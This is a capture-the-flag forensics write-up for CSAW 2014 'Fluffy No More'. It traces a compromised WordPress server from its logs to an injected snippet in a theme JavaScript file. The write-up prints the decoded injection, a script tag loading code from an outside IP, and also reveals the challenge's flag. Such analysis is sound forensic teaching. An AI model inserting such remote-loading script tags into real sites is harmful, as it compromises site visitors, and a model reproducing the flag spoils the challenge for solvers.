Posted on by and filed under CSAW 2014.

I think forensics challenges are generally horrible no fun zones, but Fluffy No More is actually a fun little scavenger hunt through a filesystem. @brad_anton gives us a tarball of the relevant parts of a compromised webserver – a MySQL database dump, /var/log/, /var/www/, and all of /etc/.

Co-credit for this challenge goes to Alex Lynch and Kirk Elifson (@kelifson)!

Upon cursory inspection, we find that we have a compromised WordPress site:

[screenshot: fluffy-var-www]

Looking through /var/log/apache2/access.log, we find Python and WPScan making a mess in the logs from a source IP of 192.168.127.137:

With the goal of not sifting through logs forever, let’s assume the server was rooted. We checked /var/log/auth.log to find a suspicious modification:

After jsbeautifying /var/www/html/wp-content/themes/twentythirteen/js/html5.js, we find a suspicious little snippet:

Replace document.write with console.log, slap it all in your favorite browser’s JavaScript console, and out comes: <script src='http://128.238.66.100/analytics.js'></script>

Download that, beautify it, and you find this wonderful piece of obfuscated code:

which is actually

We downloaded that, opened it for a laugh, and then I opened it in Notepad++ to find another PDF inside the PDF.

Open announcement.pdf in the random tool of the day, PDF Stream Dumper, to find some more JavaScript:

[screenshot: fluffy-pdf-js]

Paste that string in a web console, and we get:

“YOU DID IT! CONGRATS! fwiw, javascript obfuscation is sofa king dumb :) key{Those Fluffy Bunnies Make Tummy Bumpy}”